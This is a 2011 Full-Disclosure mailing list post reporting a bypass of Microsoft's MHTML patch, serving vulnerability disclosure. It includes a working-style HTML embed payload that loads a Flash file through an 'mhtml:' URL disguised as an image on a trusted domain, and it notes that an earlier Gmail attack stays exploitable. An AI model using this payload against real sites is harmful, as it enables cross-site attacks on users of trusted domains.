[Full-disclosure] MS mhtml patch bypass
sec yun
root at wooyun.org
Tue Apr 19 06:40:34 BST 2011
Hi
someone report a case about bypass mhtml patch
http://www.wooyun.org/bugs/wooyun-2010-01929
<embed type="application/x-shockwave-flash" src="mhtml:
http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all
AllowScriptAccess=samedomain width=500 height=500></embed>
some VUL like http://www.wooyun.org/bugs/wooyun-2010-01474 (gmail hack) will
stiil be exploitable
credits: http://www.wooyun.org/whitehats/latentwind
:)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110419/2109b1e8/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.